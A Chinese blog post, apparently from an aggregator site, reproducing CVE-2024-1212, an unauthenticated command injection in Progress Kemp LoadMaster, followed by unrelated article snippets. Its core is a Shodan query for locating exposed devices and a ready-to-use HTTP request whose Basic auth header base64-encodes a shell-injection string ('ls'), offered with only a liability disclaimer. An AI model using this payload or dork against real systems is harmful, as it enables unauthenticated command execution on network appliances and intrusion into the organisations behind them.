【漏洞复现】Progress Kemp LoadMaster 命令注入漏洞(CVE-2024-1212)

0x01 产品简介

Progress Kemp LoadMaster是一款高性能的应用交付控制器,具有可扩展性,支持实体硬件和虚拟机的负载均衡。它提供了当今应用服务所需的各种功能,包括深度用户验证、资安防护(如WAF/IPS/DDoS防护)以及零信任架构服务。这款控制器旨在为各种规模的企业和单位提供出色的负载平衡和应用程序体验。

0x02 漏洞概述

Progress Kemp LoadMaster存在命令注入漏洞,未经身份验证的远程攻击者可以通过 LoadMaster 管理界面访问系统,从而实现任意系统命令执行。

0x03 测绘语句

shodan:html:"LoadMaster"

0x04 漏洞复现

漏洞复现:

GET /access/set?param=enableapi&value=1 HTTP/1.1Host:Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=

0x05 影响范围

LoadMaster > 7.2.48.1

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/758484.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

阿博泰克杯第五届青少年国际IT精英挑战赛Java组一等奖项目——TimpleShop电商系统_关键代码说明书

原创作者:田超凡(程序员田宝宝) 版权所有,引用请注明原作者,严禁复制转载 TimpleShop关键代码说明书 1.短信验证码功能的代码: 2.js加入购物车的特效 抛物线 3.百度…

2024学习鸿蒙开发,未来发展如何?

一、前言 想要了解一个领域的未来发展如何,可以从如下几点进行,避免盲从: 国家政策落地情况就业市场如何学习 通过上述三点,就能分析出一个行业的趋势。大家可以看到,我上面的总体逻辑就是根据国家政策来分析未来方…

代码随想录day24(2)二叉树:合并二叉树(leetcode617)

题目要求:将两个二叉树合并,要求是将同位置处的两个节点值相加,如果一个为空那就将另一个二叉树的值覆盖。 思路:如果使用迭代法,就是通过层序遍历,通过队列进行判断进行相加。如果使用递归法,…

git基础-获取git仓库

通过本章的学习,应该能够配置和初始化一个仓库,开始和停止跟踪文件,暂存和提交更改。我们还将展示如何设置 Git 来忽略特定的文件和文件模式,如何快速轻松地撤销错误,如何浏览项目的历史记录并查看提交之间的更改&…

酷开科技聚焦大屏端数据研究,构建酷开系统深度挖掘大屏商业价值

中国所有的彩色大屏中,智能电视规模已经过半,OTT平台的数据价值越发引起人们关注。作为OTT行业的头部代表,酷开科技一直聚焦大屏端数据研究,目前已经形成一套基于大屏指数的智慧营销体系,让OTT大屏的数字营销化水平实现…

AI:150-基于深度学习的医学数据挖掘与病症关联发现

🚀点击这里跳转到本专栏,可查阅专栏顶置最新的指南宝典~ 🎉🎊🎉 你的技术旅程将在这里启航! 从基础到实践,深入学习。无论你是初学者还是经验丰富的老手,对于本专栏案例和项目实践都有参考学习意义。 ✨✨✨ 每一个案例都附带关键代码,详细讲解供大家学习,希望…

ModuleNotFoundError: No module named ‘torch_geometric‘

1. 解决办法——安装库 pip install torch_geometric -i https://pypi.tuna.tsinghua.edu.cn/simple总结 如果你仍然遇到问题,请确保你的pip或conda是最新版本,并且你正在使用的Python环境是激活的。此外,如果你的PyTorch版本与 torch_geom…

Anconda 在无网络的情况下安装想要的python环境

###windows python anconda 一、实现步骤 1、在本地安装好自己想要的python环境 2、下载conda-pack环境打包工具 conda-pack 3、将虚拟环境打包,将虚拟环境和Anaconda安装包拷贝到离线服务器上 4、安装Anaconda,并将虚拟环境移植到离线服务器上anaconda/envs/目…

吴恩达机器学习-可选实验室:简单神经网络(Simple Neural Network)

在这个实验室中,我们将使用Tensorflow构建一个小型神经网络 import numpy as np import matplotlib.pyplot as plt plt.style.use(./deeplearning.mplstyle) import tensorflow as tf from tensorflow.keras.models import Sequential from tensorflow.keras.laye…

win10 配置 oh-my-posh

win10 配置 oh-my-posh 0. 前置1. 安装1.1. 软件1.2. 字体1.3. 激活1.3.1. Git Bash1.3.2. PowerShell 2. 配置2.1. 效果2.2. 说明2.3. 其他2.3.1. 新版PowerShell2.3.2 conda问题 0. 前置 这个东西毕竟是个,命令行美化工具,所以需要先有一个命令行&…

芯片与针灸

所有观点,全是个人猜测,未得到科学证实,请注意识别 文章目录 前言一、Trimming 是什么?二、获取步骤1.扎针2.针灸 总结 前言 芯片的出厂过程中,有一个步骤叫做 trimming:意思就是调整芯片的性能参数&#…

Java中的可变参数

java提供了可变参数这个语法。 可变参数本质为数组。 一般可变参数应用于形参中。用于接收实参。 此时实参可以有多种形式。 一种是最正常的,实参为数组名。 public class Date1 {public void one(int ... arr){int sum0;for (int x:arr){sumx;}System.out.pri…

eth uniswap 套利交易案例四

交易hash: 0x085843b47c0d1b0f820b80c166ea8dd2e3928876fb353d107e49dcf879cf8426 交易时间: 2024.02.29 获利: 196,284刀 balancer 借了 338个 weth, 然后和 0x3BA6A019eD5541b5F5555d8593080042Cf3ae5f4 交易用 282个weth 换了293个wste…

【矩阵】54. 螺旋矩阵【中等】

螺旋矩阵 给你一个 m 行 n 列的矩阵 matrix ,请按照 顺时针螺旋顺序 ,返回矩阵中的所有元素。 示例 1: 输入:matrix [[1,2,3],[4,5,6],[7,8,9]] 输出:[1,2,3,6,9,8,7,4,5] 解题思路 1、模拟顺时针螺旋顺序遍历矩阵…

名词【语法笔记】

1.名词分为几大类 2.每一类,又有几个小类,以及所需要注意什么

【每日力扣】131.分割回文串与450.删除二叉搜索树中的节点

🔥 个人主页: 黑洞晓威 😀你不必等到非常厉害,才敢开始,你需要开始,才会变的非常厉害。 131.分割回文串 给你一个字符串 s,请你将 s 分割成一些子串,使每个子串都是 回文串 。返回 s 所有可能的…

ROS多机通信

在充分的单机学习测试之后,往往要进行真实机器人的测试,那么就要接触到多机通信的问题。ROS采用的分布式网络通信,只要正确的设置ROS_MASTER_URI和ROS_IP两个环境变量,就可以成功实现ROS的多机通信,有时我们也称之为主…

Linux系统——Mysql数据库操作

目录 一、数据库基本操作 1.查看数据库结构 1.1查看数据库信息——Show databases 1.2查看数据库中的表信息——Show tables Show tables in 数据库名 use 数据库名 show tables 1.3显示数据表的结构(字段)——Describe(Desc&#x…

+-x c++

描述 我们有两个整数:A 和 B。 请打印出AB、A−B和AB中最大的数。 输入描述 A B 输出描述 打印 AB、A−B 和 AB 中最大的数字。 用例输入 1 -13 3用例输出 1 -10用例输入 2 1 -33用例输出 2 34用例输入 3 13 3用例输出 3 39提示 样本输出 1 AB…

child_process

Node.js 中的 child_process 模块提供了一系列用于创建和管理子进程的API。这里列出一些常用的API及其使用示例: 1. child_process.exec() 异步执行命令并收集其输出,适合简单命令。 const { exec } require(child_process);exec(ls -l, (error, std…